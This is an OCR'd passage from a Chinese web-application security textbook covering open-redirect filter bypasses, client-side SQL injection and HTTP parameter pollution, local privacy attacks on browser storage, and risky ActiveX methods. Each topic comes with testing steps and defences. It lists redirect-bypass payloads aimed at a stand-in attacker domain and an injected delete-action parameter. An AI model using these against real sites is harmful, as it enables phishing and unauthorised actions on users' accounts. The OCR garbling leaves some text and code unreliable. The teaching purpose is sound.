有 办 法 确定 应 用 程序 是 否 易 于 受到 攻击 ， 因 此 ， 接 下 来 应 该 探查 应 用 
程序 采用 的 防御 机 制 ， 确 定 是 否 能 够 各 开 它们 以 执行 任意 重 定 同 。 通 
常会 遇 到 以 下 两 种 防御 : 党 试 阻止 绝对 URL、 附 加 一 个 特殊 的 绝对 
URL 前 级 。 

e | 明 止 绝对 URL 

应 用 程序 可 能 会 检查 用 户 提 交 的 字符 串 是 否 以 http:/ 开 头 ， 如 果 
是 ， 束 阻止 该 请 求 。 这 时 ， 使 用 下 面 的 技巧 可 以 成 功 创建 一 个 指 癌 外 
部 Web 站 点 的 重 定向 (请 注意 第 三 行 开头 的 空格 ) : 


HtTp://mdattacker.net 

S00http: //mdattacker.net 

http: //mdattacker.net 

//mdattacker.net 
%$68%74%74%70%3a%2f%2fmdattacker.net 
%$2568%2574%2574%2570%253a%252 £252 fmdattacker.net 
https: //mdattacker.net 

http: \\mdattacker.net 

http: ///mdattacker.net 


另外 ， 应 用 程序 可 能 会 删除 http:/ 及 任何 指定 的 外 部 域 ， 党 试 净化 
绝对 URL。 这 时 ， 使 用 上 面 的 技 马 可 以 成 功 避 开 净 化 ; 同时 还 应 测试 
下 面 的 攻击 是 否 可 行 : 


http://http://mdattacker.net 
http: //mdattacker.net/http://mdattacker.net 
hthttp://tp://mdattacker.net 


有 时 ， 应 用 程序 可 能 会 检验 用 户 提 交 的 字符 串 是 否 以 指 疝 它 目 己 
的 域名 的 绝对 URL 开 头 ， 或 是 否 包 含 这 个 URL。 这 时 ， 下 面 的 攻击 可 
能 有 效 : 
http: //mdsec.net.mdattacker.net 


http: //mdattacker.net/?http://mdsec.net 
http: //mdattacker.net/%23http: //mdsec.net 


试 访问 


http://mdsec.net/updates/52/ 


http://mdsec.net/updates/57/ 
http://mdsec.net/updates/59/ 
http://mdsec.net/updates/66/ 
http://mdsec.net/updates/69/ 


@ ”附加 绝对 前 级 
应 用 程序 可 能 会 在 用 户 提 交 的 子 符 串 前 附加 一 个 绝对 URL 前 级 ， 
从 而 建立 重 定 同 的 目标 


GET /updates/72/?redir=/updates/update29. html HTTP/1.1 


[© 


Host: mdsec.net 


HTTP/1.1 302 Object moved 


Location: http://mdsec.net/updates/update29.html 


这 时 ， 我 们 无 法 确定 应 用 程序 是 否 易于 受到 攻击 。 如 宁 所 使 用 的 
前 绥 由 http:// 与 应 用 程序 的 域名 组 成 ， 但 在 域名 后 没有 和 斜 线 字符 ， 那 么 
它 就 易于 受到 攻击 。 例 如 ， 下 面 的 URL 
http://mdsec.net/updates/72/?redir=.mdattacker.net 
会 重 定向 到 
http://mdsec.net.mdattacker.net 
它 由 攻击 者 控制 ， 前 提 是 攻击 者 控制 着 域 mdattacker.net 的 DNS 记 录 。 
然而 ， 如 果 绝 对 URL 前 级 确实 包含 斜 线 字符 VY) 或 服务 器 上 的 某 
个 子 日 录 ， 那 么 应 用 程序 可 能 不 会 受到 针对 外 部 域 的 重 定向 攻击 。 这 
时 ， 攻 击 者 最 多 只 能 构建 一 个 URL， 将 用 户 重 定向 到 同一 应 用 程序 中 
的 另 一 个 URL。 通 常 ， 这 种 攻击 并 不 能 取得 任何 成 果 ， 因 为 如 果 攻 击 
者 能 够 诱 使 用 户 访 问 应 用 程序 中 的 一 个 URL， 那 么 他 大 概 也 只 能 同 他 
们 直接 传送 另 一 个 URL 。 


尝试 访问 


http://mdsec.net/updates/72/ 


如 果 使 用 从 DOM 中 查询 数据 的 客户 端 JavaScript 实 现 重 定 同 ， 则 负 
责 执行 重 定 向 与 相关 确认 的 所 有 代码 通常 将 在 客户 端 上 可 见 。 因 此 ， 
应 仔细 检查 这 些 代 码 ， 确 定 它 如 何 将 用 户 控制 的 数据 合并 到 URL 中， 
以 及 它 是 否 执行 了 任何 确认 ， 如 果 是 ， 是 否 有 什么 办 法 可 以 避 开 确 
认 。 注 意 ， 和 基于 DOM 的 XSS 漏 洞 一 样 ， 在 将 脚本 返回 浏 贤 髓 之 前 ， 
服务 器 可 能 对 其 执行 了 其 他 确认 。 下 面 的 JavaScript API 可 用 于 执行 重 
定 问 : 

g document.location 

DQ document. URL 

J document.open () 
g window.location.href 
g window.navigate () 
gJ window.open () 


尝试 访问 


http://mdsec.net/updates/76/ 


http://mdsec.net/updates/79/ 
http://mdsec.net/updates/82/ 
http://mdsec.net/updates/9 1/ 
http://mdsec.net/updates/92/ 
http://mdsec.net/updates/95/ 


2. 防止 开放 式 重 定向 漏洞 

绝 不 将 用 户 提交 的 数据 合并 到 重 定 同 目标 中 ， 征 避免 开放 式 重 定 
癌 漏 洞 的 最 有 效 方法 。 开 发 者 这 样 做 出 于 各 种 原因 ， 但 通常 我 们 都 可 
以 找到 替代 办 法 。 例 如 ， 用 户 界面 中 常常 包 全 一 组 链 授 ， 每 个 链接 指 
问 一 个 重 定 同 页 面 ， 并 以 目标 URL 为 参数 。 这 时 ， 可 能 的 替代 方法 如 
F 


口 从 应 用 程序 中 删除 重 定向 页 面 ， 用 直接 指向 相关 目标 URL 的 链 
接 奉 代 指 向 重 定 同 页 面 的 链接 。 

口 建立 一 个 包含 所 有 有 效 重 定向 URL 的 列表 。 不 以 参数 的 形式 向 
重 定 同 页 面 传送 日 标 URL， 而 是 传送 这 个 列表 的 索引 。 重 定向 页 面 应 
在 它 的 列表 中 查询 这 个 索引 ， 并 返回 一 个 指向 相关 URL 的 重 定 同 。 

如 果 重 定 癌 页 面 不 可 避免 地 要 收 到 用 户 提 交 的 输入 并 将 它 合 并 到 
重 定向 日 标 中 ， 应 使 用 以 下 措施 降低 重 定 辣 攻击 的 风险 。 

O 应 用 程序 应 在 所 有 重 定 疝 中 使 用 相对 URL， 重 定向 页 面 应 严格 
确认 它 收 到 的 URL 为 相对 URL。 它 应 当 确 保 : 用 户 提 交 的 URL 或 者 以 
其 后 接 一 个 字母 的 斜 线 字符 开头 ， 或 者 以 一 个 字母 开头 ， 并 且 在 第 一 
个 斜 线 前 没有 冒号 。 应 拒绝 ， 而 不 是 净化 任何 其 他 输入 。 

口 应 用 程序 应 该 在 所 有 重 定 向 中 使 用 相对 于 Web 根 目录 的 URL， 
在 发 布 重 定 回 之 前 ， 重 定 同 页 面 应 在 所 有 用 户 提交 的 URL 前 附加 
http:/yourdomainname.com。 如 果 用 户 提交 的 URL 并 不 以 笠 线 字符 开 
头 ， 应 在 它 的 前 面 附 加 http:/yourdomainname.comy/。 

口 应 用 程序 应 对 所 有 重 定向 使 用 绝对 URL， 重 定向 页 面 在 发 布 重 
定 回 之 前 ， 应 确认 用 户 提 区 的 UREL 以 http:/yourdomainname.comy/ 开 


头 。 此 外 ， 应 拒绝 任何 其 他 输入 。 

和 基于 DOM 的 XSS 漏 洞 一 样 ， 建 议 应 用 程序 不 要 根据 DOM 数 据 通 
过 客户 端 脚本 执行 重 定向 ， 因 为 这 些 数 据 不 在 服务 器 的 直接 控制 范围 
内 o 


13.4.4 客户 端 SQL 注入 


HTML5 文 持 客 户 端 SQL 数据 库 ， 应 用 程序 可 使 用 该 数据 库 在 客户 
端 存储 数据 。 这 些 数据 库 使 用 JavaScript 访 问 ， 如 以 下 示例 所 示 : 


var db = openDatabase('contactsdb', '1.0', '‘WahhMail contacts', 1000000}; 


db.transaction{function (tx { 


IAA REF BY CE A ED BENE as Se a i, Pa tee 
时 将 这 些 数据 快速 检索 到 用 户 界 面 中 。 它 还 允许 应 用 程序 以 “离线 模 
式 ” 运 行 ， 在 这 种 模式 下 ， 所 有 由 应 用 程序 处 理 的 数据 将 驻 留 在 客户 
eu UW ae 
同步 。 

我 们 在 第 9 章 中 介绍 了 如 何在 服务 器 端 SQL 数据 库 中 实施 SQL 注入 
攻击 ， 在 这 种 攻击 中 ， 攻 击 者 将 受 其 控制 的 数据 以 危险 的 方式 插入 
SQL 查询 中 。 实 际 上 ， 在 客户 端 也 可 能 发 生 此 类 攻击 。 下 面 列 出 了 一 
些 可 能 受到 这 种 攻击 的 应 用 程序 。 

口 社交 网 络 应 用 程序 ， 这 类 应 用 程序 将 用 户 的 联系 人 信息 存储 在 
本 地 数据 库 中 ， 包 括 联 系 人 姓名 和 状态 更 新 。 

口 新 闻 应 用 程序 ， 这 类 应 用 程序 将 文章 和 用 户 评论 存储 在 本 地 数 
据 库 中 ， 以 便于 离线 查看 。 

口 Web 邮 件 应 用 程序 ， 这 类 应 用 程序 将 电子 邮件 存储 在 本 地 数据 
库 中 ， 在 离线 模式 下 运行 时 ， 则 存储 待 发 邮件 以 便于 稍 后 发 送 。 

在 这 些 情况 下 ， 攻 击 者 可 以 将 专门 设计 的 输入 包含 在 受 其 控制 的 
一 组 数据 中 〈 应 用 程序 在 本 地 存储 这 些 数 据 ) ， 从 而 实施 客户 端 SQL 
注入 攻击 。 例 如 ， 通 过 发 送 一 封 电子 邮件 ， 并 在 主题 行 中 包含 SQL 广 
入 攻击 代码 《如 果 这 些 数 据 儒 入 在 客户 端 SQL 查询 中 ) ， 就 可 以 攻破 
收 件 人 用 户 的 本 地 数据 库 。 如 条 应 用 程序 以 危险 的 方式 使 用 本 地 数据 
库 ， 束 可 能 导致 严重 的 攻击 。 仅 仅 使 用 SQL 注入 ， 攻 击 者 吏 可 以 从 数 


ea 


据 库 中 检索 用 户 已 收 到 的 其 他 邮件 的 内 容 ， 将 这 些 数据 复制 到 发 送 给 
ae ea nese 

通 单 存 储 在 本 地 数据 库 中 的 数据 类 型 可 能 为 SQL 元 字符 ， 如 单 引 
号 。 因 此 ， 在 正 稼 使 用 测试 期 间 即 可 确定 许多 SQL 注入 漏洞 ， 从 而 实 
施 针 对 SQL 注入 攻击 的 防 箱 机 制 。 和 服务 硕 端 注入 一 样 ， 这 些 防 御 机 
制 也 可 以 通过 各 种 方法 规避 ， 从 而 实施 成 功 的 攻击 。 


13.4.5 ”客户 端 HTTP 参 数 污染 


在 第 9 章 中 ， 我 们 介绍 了 如 何在 某 些 情况 下 使 用 HTTP 参 数 污染 攻 
击 来 破坏 服务 顺 端 应 用 程序 逻辑 。 有 时 ， 这 些 攻击 也 可 以 在 客户 端 实 
施 。 

以 一 个 使 用 以 下 URL 加 载 收 件 箱 的 Web 邮 件 应 用 程序 为 例 : 


https://wahh-mail.com/show?folder=inbox&order=down&size=20&start=1 


在 收 件 箱 中 ， 每 封 邮件 旁 显示 了 几 个 链 授 ， 可 用 于 执行 删除 、 转 
发 和 回复 等 操作 。 例 如 ， 回 复 第 12 封 邮件 的 链接 如 下 : 


“a href="deaction? folder=inboxtzorder=downksize=20&start=lémessace=l2é&action= 


reply&rnd=1935612936174">reply</a> 


这 些 链接 中 的 一 些 参 数 将 被 复制 到 收 件 箱 URL 中 。 即 使 应 用 程序 
能 够 有 效 防 范 XSS 攻 击 ， 但 攻击 者 仍然 可 以 构建 一 个 URL， 使 用 在 这 
些 链接 中 回 显 的 其 他 值 来 显示 收 件 箱 。 例 如 ， 攻 击 者 可 以 提供 以 下 参 
数 : 


start=1%26action=delete 


此 参数 包含 一 个 URL 编 码 的 & 字 符 ， 应 用 程序 服务 器 将 目 动 对 该 
字符 进行 解码 。 传 递 给 应 用 程序 的 start 参 数 的 值 为 : 

<a href-"deaction? folder-inboxsorder-down&size-20k&start-l&éaction-deletes& 

message=l12éaction=reply&rnd=1935612936174">reply</a> 

如 采 应 用 程序 接受 这 个 无 效 值 并 仍然 显示 收 件 箱 ， 同 时 不 加 修改 
地 回 显 该 值 ， 用 于 回复 第 12 封 邮件 的 链接 将 变 为 : 


nre=="sSoacz on?*o Ser=:Tboxhorder=donwrksi7a=2055favf=15acrion=da1efreg 


mess2ge=_2kac -Lon=rep_y&rnd=1935¢1293e1 /A">resly</a> 


现在 ， 此 链接 包含 两 个 操作 参数 一 一 一 个 指定 delete， 一 个 指定 
reply。 和 标准 的 HITTP 参 数 污染 一 样 ， 在 用 户 单 击 “ 回 复 ” 链 按时 ， 应 用 
程序 的 行为 取决 于 它 如 何 处 理 重 复 的 参数 。 许 多 时 候 ， 应 用 程序 使 用 
ee a ieee 


请 注意 ， 在 本 示例 中 ， 用 于 执行 操作 的 链接 包含 一 个 rnd 参 数 ， 它 
实际 上 是 一 个 反 CSREF 令 有 牌 ， 以 防止 攻击 者 通过 标准 的 CSRF 攻 击 轻松 
诱发 这 些 操 作 。 由 于 客户 端 HPP 攻 击 会 注入 由 应 用 程序 构建 的 现 有 链 
接 ， 因 此 该 反 CSRF 令 牌 将 以 正常 方式 进行 处 理 ， 因 而 无 法 阻止 攻击 。 

在 现实 世界 的 大 多 数 Web 邮 件 应 用 程序 中 ， 很 可 能 存在 更 多 可 供 
利用 的 操作 ， 包 括 删 除 所 有 邮件 、 转 发 单个 邮件 ， 以 及 创建 通用 的 邮 
件 转 发 规则 。 根 据 这 些 操作 的 实施 方式 ， 攻 击 者 就 可 以 在 链接 中 注入 
若干 所 需 的 参数 ， 其 至 利用 本 站 重 定向 功能 ， 以 诱 使 用 户 执 行 正 常情 
况 下 受 反 CSRF 防 御 保 护 的 复杂 操作 。 此 外 ， 攻 击 者 还 可 以 使 用 多 级 
UREL 编 码 ， 在 一 个 UREL 中 注入 几 个 攻击 。 在 这 种 情况 下 ， 当 用 户 符 试 
阅读 邮件 时 ， 将 执行 一 个 操作 ， 而 当 用 户 党 试 返回 收 件 箱 时 ， 则 会 执 
行 另 一 个 操作 © 


13.5” 本 地 隐私 攻击 


许多 用 户 从 共享 的 环境 中 访问 Web 应 用 程序 ， 这 时 ， 攻 击 者 可 直 
接 访问 用 户 访问 的 同一 人 台 计 算 机 。 在 这 种 情况 下 ， 如 有 果 应 用 程序 存在 
漏洞 ， 它 们 的 用 户 就 易于 受到 一 系列 攻击 。 这 类 攻击 主要 针对 以 下 领 
域 。 


T 注解 应 用 程序 可 能 会 采用 各 种 机 制 在 用 户 的 计算 机 上 存 
储 敏感 信息 。 许 多 时 候 ， 为 测试 应 用 程序 是 否 采用 了 某 种 存储 机 

制 ， 最 好 是 使 用 完全 “干净 ”的 浏览 器 ， 以 便于 接受 测试 的 应 用 程序 
存储 的 数据 不 会 丢失 在 已 存储 的 现 有 数据 中 。 要 做 到 这 一 点 ， 最 理 


想 的 方法 ， 是 使 用 包含 全 新 安装 的 操作 系统 和 任何 浏览 絮 的 虚拟 


机 

此 外 ， 在 某 些 操 作 系 统 上 ， 在 使 用 文件 系统 内 置 的 管理 右 时 ， 
包含 本 地 存储 数据 的 文件 和 文件 夹 在 默认 情况 下 可 能 处 于 隐藏 状 
仿 。 为 确保 标识 所 有 相关 数据 ， 应 将 计算 机 配置 为 显示 所 有 隐藏 文 
件 和 操作 系统 文件 。 


13.5.1 久 性 cookie 


一 些 应 用 程序 将 敏感 数据 保存 在 持久 性 cookie 中 ， 大 多 数 浏 览 妖 
将 该 cookie 存 放 在 本 地 文件 系统 


渗透 测试 步骤 


(1) 检查 应 用 程序 解析 过 程 中 〈 请 参阅 第 4 章 了 解 相 关内 容 ) 
确定 的 所 有 cookie。 如 果 发 现 有 任何 Set-cookie 指 令 包 含 将 来 日 期 的 
expires 属 性 ， 那 么 浏览 器 会 将 相关 cookie 保 存 到 这 个 日 期 。 例 如 : 


UID=d475dfc6eccca72d0e expires=Fri, 10-Aug-18 16:08:29 GMT; 


(2) 如 果 某 个 持久 性 cookie 中 包含 任何 敏感 数据 ， 本 地 攻击 者 
忠 能 够 截获 这 些 数据 。 即 使 持久 性 cookie 中 包含 的 是 加 密 值 ， 但 如 
果 这 个 值 发 挥 着 非常 关键 的 作用 (如 不 需 用 户 输入 证 书 即 可 重新 验 
证 其 身份 ) ， 则 截获 这 个 值 的 攻击 者 根本 不 用 破译 它 的 内 容 ， 就 可 
以 将 它 重新 提交 给 应 用 程序 〈 请 参阅 第 6 章 了 解 相 关内 容 ) 。 


尝试 访问 


http://mdsec.net/auth/227/ 


13.5.2 ”缓存 Web 内 容 


大 多 数 浏 蜗 亏 将 非 SSL Web 内 容 保存 在 缓存 中 ， 除 非 Web 站 点 特 
别 指示 不 要 这 样 做 。 缓 存 数 据 一 般 保存 在 本 地 文件 系统 中 。 


渗透 测试 步骤 


(1) 对 于 任何 通过 HTTP 访 问 和 包含 敏感 数据 的 应 用 程序 页 
面 ， 应 检查 服务 器 响应 的 内 容 ， 确 定 所 有 缓存 指令 。 

(2) 下 面 的 指令 可 阻止 浏览 器 缓存 某 个 页 面 。 注 意 ， 这 些 指 
令 可 以 在 HTTP 啊 应 消息 头 或 HTML 元 标签 中 指定 。 


Expires: 0 
Cache-control: no-cache 
Pragma: no-cache 


(3) 如 果 未 发 现 这 些 指令 ， 相 关 页 面 很 可 能 会 被 一 个 或 几 个 
浏 贤 圳 缓存。 注意 ， 每 个 页 面 都 会 执行 缓存 指令 ， 因 此 必须 检查 每 
一 个 基于 HTTP 的 敏感 页 面 。 

(4) 为 确保 缓存 敏感 信息 ， 应 使 用 一 个 默认 安装 的 标准 浏览 
ax, {Internet Explorer 或 Firefox。 在 浏 贤 絮 的 配置 中 ， 完 全 清除 它 
的 缓存 和 全 部 cookie， 然 后 访问 包含 敏感 数据 的 应 用 程序 页 面 。 检 
查 出 现在 缓存 中 的 文件 ， 看 其 中 是 否 包含 敏感 数据 。 如 果 有 大 量 文 
件 生 成 ， 可 以 从 页 面 的 源 代码 中 提取 一 个 特殊 的 字符 串 ， 并 在 缓存 
中 搜索 该 字符 串 。 

常用 浏览 器 的 默认 缓存 位 置 如 下 。 

Q Internet Explorer C:\Documents and Settings\ 用 户 名 \Local 
Settings\Temporary Internet FilesS\Content.IE5 的 子 目 孙 。 

注意 ， 在 Windows Explorer 中 ， 要 查看 这 个 文件 来 ， 必 须 
输入 准确 的 路 径 并 显示 隐藏 的 文件 夹 ， 或 通过 命令 行 浏 贤 
至 这 个 文件 夹 。 

口 Firefox (Windows 中 ) 一 一 C:\Documents and Settings\ 用 户 名 
\Local Settings\Application Data\Mozilla\Firefox\Profiles\ 配 置 文件 名 
\Cache ° 

g Firefox (Linux) ~/.mozilla/firefox/ 配 置 文件 名 /Cache ° 


尝试 访问 


http://mdsec.net/auth/249/ 


13.5.3 ”浏览 历史 记录 


许多 浏 贤 右 都 保存 有 浏览 历史 记录 ， 其 中 可 能 包含 通过 URL 参 数 
传送 的 任何 敏感 数据 。 


渗透 测试 步骤 


(1) 确定 应 用 程序 中 通过 URL 参 数 传 送 敏感 数据 的 任何 情 
YF 

(2) 如 果 存 在 这 样 的 情况 ， 应 检查 浏览 器 的 历史 记录 ， 证 实 
这 些 数据 已 经 保存 在 那里 。 


尝试 访问 


http://mdsec.net/auth/90/ 


13.5.4 ”自动 完成 


许多 浏览 妖 对 基于 文本 的 输入 字段 执行 一 项 可 由 用 户 配 置 的 自动 
完成 功能 ， 这 些 字 段 可 保存 诸如 信用 卡号 码 、 用 户 名 与 密码 之 类 的 敏 
感 数据 。Internet Explorer 与 Firefox 分 别 将 目 动 完成 数据 保存 在 注册 表 
与 文件 系统 中 。 

如 前 所 述 ， 除 可 被 本 地 攻击 者 访问 外 ， 在 某 些 情况 下 ， 保 存在 目 
动 完 成 缓存 中 的 数据 也 可 通过 XSS 攻 击 获 取 。 


渗透 测试 步骤 


(1) 检查 可 从 其 文本 字段 中 获取 敏感 数据 的 任何 表单 的 HTML 


源 代码 。 

(2) 如 果 没 有 在 表单 标签 或 输入 字段 的 标签 中 设置 
autocomplete=off 属 性 ， 输 入 的 数据 将 保存 在 已 启用 自动 完成 的 浏览 
anf o 


尝试 访问 


http://mdsec.net/auth/260/ 


13.5.5”Flash 本 地 共享 对 象 


Flash 浏 览 絮 扩展 实施 它 上 自己 的 本 地 存储 机 制 ， 这 种 机 制 称 为 本 地 
共享 对 象 (LSO) ， 也 称 为 Flash cookie。 与 其 他 多 数 机 制 不 同 ， 存 储 
在 LSO 中 的 数据 可 在 不 同 的 浏览 絮 之 间 共 诗 ， 只 是 这 些 浏览 絮 安 装 了 
Flash 扩 展 。 


渗透 测试 步骤 


(1) 有 一 些 用 于 Firefox 的 插件 (如 BetterPrivacy) 可 浏览 由 个 
体 应 用 程序 创建 的 LSO 数 据 。 


(2) 可 以 直接 碍 看 磁盘 上 的 原始 LSO 数 据 的 内 容 。 这 些 数 据 的 
位 置 因 浏 哎 器 和 操作 系统 而 异 。 例 如 ， 对 于 最 新 版 本 的 Internet 
Explorer，LSO 数 据 位 于 以 下 文件 夹 中 : 
C:\Users\{ fF % }\AppData\Roaming\Macromedia\Flash 
Player\#SharedObjects\{ 随 机 六 {域名 汶 {存储 名 }{SWF 文 件 名 } 


尝试 访问 


http://mdsec.net/auth/245/ 


13.5.6 ”Silverlight 独 立 存储 


Silverlight 浏 览 器 扩展 实施 目 己 的 本 地 存储 机 制 ， 这 种 机 制 称 为 
Silverlight 独 立 存储 。 


渗透 测试 步骤 


可 以 直接 查看 磁盘 上 的 原始 Silverlight 独 立 存储 数据 的 内 容 。 对 
于 最 新 版 本 的 Internet Explorer， 这 些 数据 存储 在 以 下 位 置 的 一 系列 
多 层 符 套 、 随 机 命名 的 文件 夹 中 : 

C:\Users\{ H F 4% }\AppData\LocalLow\Microsoft\Silverlight\ 


尝试 访问 


http://mdsec.net/auth/239/ 


13.5.7 Internet Explorer userData 


Internet Explorer 实 施 目 己 的 本 地 存储 机 制 ， 这 种 机 制 称 为 


userData ° 


渗透 测试 步骤 


可 以 直接 查看 存储 磁盘 上 下 的 userData 中 的 原始 数据 的 内 容 。 
对 于 最 新 版 本 的 Pnternet Explorer， 这 些 数 据 位 于 以 下 文件 夹 中 : 

C:\Users\user\AppData\Roaming\Microsoft\Internet 
Explorer\UserData\Low\{ ha4#L} 


尝试 访问 


http://mdsec.net/auth/232/ 


13.5.8 HTML5 本 地 存储 机 制 


HTML5 正 引入 一 系列 新 的 本 地 存储 机 制 ， 它 们 包括 : 

口 会 话 存储 ; 

口 本 地 存储 ; 

口 数据 库存 储 。 

这 些 机 制 的 规范 和 用 法 仍 在 开发 阶段 。 并 非 所 有 浏览 器 都 实施 了 
所 有 这 些 机 制 ， 测 试 其 用 法 及 查看 存储 的 任何 数据 的 方式 因 浏 览 名 而 
Eis 


13.5.9_ 防 止 本 地 隐私 攻击 


即使 敏感 数据 经 过 加 密 ， 应 用 程序 也 应 避免 将 其 保存 在 持久 性 
cookie 中 。 因 为 截获 这 些 数据 的 攻击 者 可 重新 将 其 提交 给 应 用 程序 。 

应 用 程序 应 使 用 适当 的 缓存 指令 防止 浏览 锅 保 存 敏感 数据 。 在 
ASP 应 用 程序 中 ， 下 面 的 指示 将 在 服务 右 中 包 侣 必要 的 指令 : 


<% Response.CacheControl = "no-cache" %> 
<% Response.AddHeader "Pragma", "no-cache" %> 
<% Response.Expires = 0 %> 


在 Java 应 用 程序 中 ， 可 使 用 以 下 命令 达到 相同 的 目的 : 
<% 


response. setHeader({"Cache-Control", "no-cache") ; 
response. setHeader("“Pragma", “no-cache") ; 
response.setDateHeader ("Expires", 0); 

$> 


应 用 程序 决 不 能 使 用 URL 传 送 敏 感 数据 ， 因 为 有 许多 位 置 都 可 能 
记录 这 些 URL。 应 用 程序 应 使 用 通过 POST 方 法 提交 的 HTML 表 单传 送 
所 有 这 些 数 据 。 

任何 时 候 ， 如 果 用 户 在 文本 输入 字段 中 填 入 敏感 数据 ， 都 应 在 表 
单 或 字段 标签 中 指定 autocomplete=off 必 性。 

其 他 客户 端 存储 机 制 ， 如 HTML5 即 将 引入 的 新 功能 ， 将 为 应 用 程 
序 提供 实施 重要 功能 的 机 会 ， 包 括 更 快速 地 访问 特定 的 用 户 数据 ， 并 
能 够 在 网 络 访问 不 可 用 时 继续 工作 。 如 采 需 要 在 本 地 存储 敏感 数据 ， 
最 好 是 对 这 些 数据 进行 加 密 ， 以 防止 攻击 者 直接 访问 它们 。 此 外 ， 应 
告知 用 户 存 储 在 本 地 的 数据 的 本 质 ， 向 他 们 警告 攻击 者 本 地 访问 这 些 
数据 的 风险 ， 以 便 其 在 需要 时 禁用 此 功能 。 


13.6 Activex 


如 我 们 在 第 5 章 中 所 述 ， 应 用 程序 可 以 使 用 各 种 厚 客 户 端 技术 将 它 
的 一 些 处 理 操作 分 配给 客户 端 完 成 。ActiveX 控 件 对 于 针对 其 他 用 户 的 
攻击 者 特别 有 用 。 如 采 应 用 程序 安装 了 一 个 可 从 目 己 的 页 面 调用 的 欣 
件 ， 该 控件 必须 注册 为 "脚本 执行 安全 ”。 这 样 ， 用 户 访问 的 任何 其 他 
Web 站 点 都 能 够 使 用 这 个 控件 。 

通 前， 浏览 右 并 不 接受 Web 站 点 要 求 它 们 安 竣 的 任何 ActiveX 控 
件 。 默 认 情 况 下 ， 当 Web 站 点 试图 安 闭 某 个 控件 时 ， 浏 览 禹 会 显示 一 
个 安全 和 警报， 要求 得 到 用 户 许可 。 有 是 否 信任 发 布 该 控件 的 Web 站 点 以 
及 是 否 允 许 安 儿 该 控件 ， 将 由 用 户 目 行 决 是 。 但 是 ， 如 采用 户 安 闭 该 
控件 ， 并 且 其 中 包含 任何 漏洞 ， 则 用 户 访问 的 任何 恶意 Web 站 点 都 可 
以 利用 这 些 漏 洞 。 

ActiveX 探 件 中 常见 的 对 攻击 者 有 用 的 漏洞 主要 分 为 两 类 。 

口 由 于 ActiveX 控 件 通 常 以 C/C++ 之 类 的 本 地 语言 编写 ， 它 们 之 中 
很 可 能 存在 一 些 典 型 的 软件 漏洞 ， 如 绥 冲 区 洲 出 、 整 数 漏洞 以 及 格式 
字符 串 漏洞 (请 参阅 第 16 章 了 解 详情 ) 。 人 们 已 经 在 流行 Web 应 用 程 
序 (如 在 线 赌博 站 点 ) 发 布 的 ActiveX 控 件 中 发 现 了 大 量 这 些 类 型 的 漏 
a a a a 
AR ° 
į 口 许多 ActiveX 控 件 中 包含 一 些 本 质 上 存在 风险 、 易 说 滥用 的 方 
VF o 


m LaunchExe(BSTR ExeName) 
m SaveFile(BSTR FileName, BSTR Url) 
m LoadLibrary(BSTR LibraryPath) 
m ExecuteCommand(BSTR Command) 
开发 者 往往 会 执行 这 些 方法 来 提高 控件 的 灵活 性 ， 以 便于 将 来 扩 
展 控件 的 功能 ， 而 不 必 部 署 全 新 的 控件 。 但 是 ， 一 旦 安 疾 了 这 些 控 
件 ， 任 何 恶 意 站 点 当然 也 可 以 通过 同样 的 方式 对 其 进行 "扩展 "， 从 而 


执行 针对 用 户 的 恶意 操作 。 


当 应 用 程序 安装 ActiveX 控 件 时 ， 除 浏览 器 会 显示 一 个 要 求 获得 安 
装 控 件 许可 的 警报 外 ， 还 应 该 可 以 在 某 个 应 用 程序 页 面 的 HIML 源 代 
码 中 看 到 类 似 于 下 面 的 代码 : 
<object id="oMyObject" 
classid="CLSID:A61BC839-5188-4AE9-76AF-109016FD8901" 
codebase="https://wahh-app.com/bin/myobject.cab"> 
</object> 


这 段 代码 告诉 浏 斋 器 用 指定 的 名 称 和 classid 示 例 化 ActiveX 控 件 ， 
并 从 指定 的 URL 下 载 该 控件 。 如 果 浏 贤 器 中 己 经 安装 有 控件 ， 就 不 需 
要 使 用 codebase 参 数 ， 浏 宽 器 会 根据 控件 的 唯一 classid， 从 本 地 计算 机 
中 找到 该 控件 。 

如 果 用 户 人 允许 安装 这 个 控件 ， 浏 贤 絮 会 将 其 注册 为 “脚本 执行 安 
全 ”。 这 意味 着 将 来 任何 Web 站 点 都 可 以 将 其 示例 化 ， 并 调用 它 的 方 
法 。 可 以 通过 检查 注册 表 项 HKEY_ CLASSES_ROOTACLSID\ 从 上 面 的 
HTML 中 提取 的 控件 classid\Implemented Categories 人 确认 这 一 点 。 如 果 
其 中 存在 子 注 册 表 项 7DD95801-9882-11CF-9FA9-00AA006C42C4， 则 
表示 该 控件 已 经 注册 为 “脚本 执行 安全 ”， 如 图 13-6 所 示 。 
& J (0C116523-3028-11D2-8AD05-00104B9B48AB} be Name _| Type 
& C {DC122CB6-CO8E-4DCE-BE4A-DBDC2FF3E2BF] 22) Default) REG SZ 


4) {0C16C27E-46£7-11D0-BFC3-0o20Fe00e8024} 一 
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图 13-6 已 注册 为 “脚本 执行 安全 ”的 控件 


浏览 右 示 例 化 ActiveX 控 件 后 ， 束 可 以 通过 以 下 脚本 调用 它 的 方 
TE: 
<script> 


document. oMyObject. LaunchExe ( 'myAppDemo.exe'); 
</script> 


渗透 测试 步骤 


一 种 探查 ActiveX 漏 洞 的 简单 方法 是 ， 修 改 调用 该 控件 的 HTML 
代码 ， 问 其 提交 目 己 的 参数 ， 然 后 监控 执行 结 来 。 
(1) 使 用 第 16 章 描述 的 相同 攻击 有 效 载 答 可 探查 绥 促 区 洪 出 


之 类 的 漏洞 。 如 有 果 以 不 受 控 制 的 方式 触发 这 种 漏洞 ， 很 可 能 会 导致 
人 负责 该 控件 执行 的 浏 蜗 占 进程 朋 汝 。 

(2) 本 质 上 存在 风险 的 方法 通过 其 名 称 即 可 确定 ， 如 
LaunchExe。 在 其 他 情况 下 ， 控 件 名 称 可 能 无 害 或 售 义 模糊 ， 但 有 
时 ， 一 些 有 用 的 数据 ， 如 文件 名 、URL 或 系统 命令 ， 明 显 被 用 作 控 
件 的 参数 。 应 该 莹 试 将 这 些 参数 修改 为 任意 值 ， 确 定 控件 是 否 按 预 
计 的 方式 处 理 输入 。 


我 们 常常 发 现 ， 应 用 程序 并 没有 调用 控件 的 所 有 方法 。 例 如 ， 一 
些 方 法 主要 用 于 测试 目的 、 一 些 已 被 取代 但 尚未 删除 、 一 些 可 能 是 为 
了 方便 将 来 使 用 或 用 于 目 我 更 新 目的 。 为 了 对 控件 进行 综合 测试 ， 有 
必要 枚 举 出 它 通 过 这 些 方法 暴露 的 各 种 受 攻击 面 ， 并 对 这 些 受 攻击 面 
进行 彻底 测试 。 

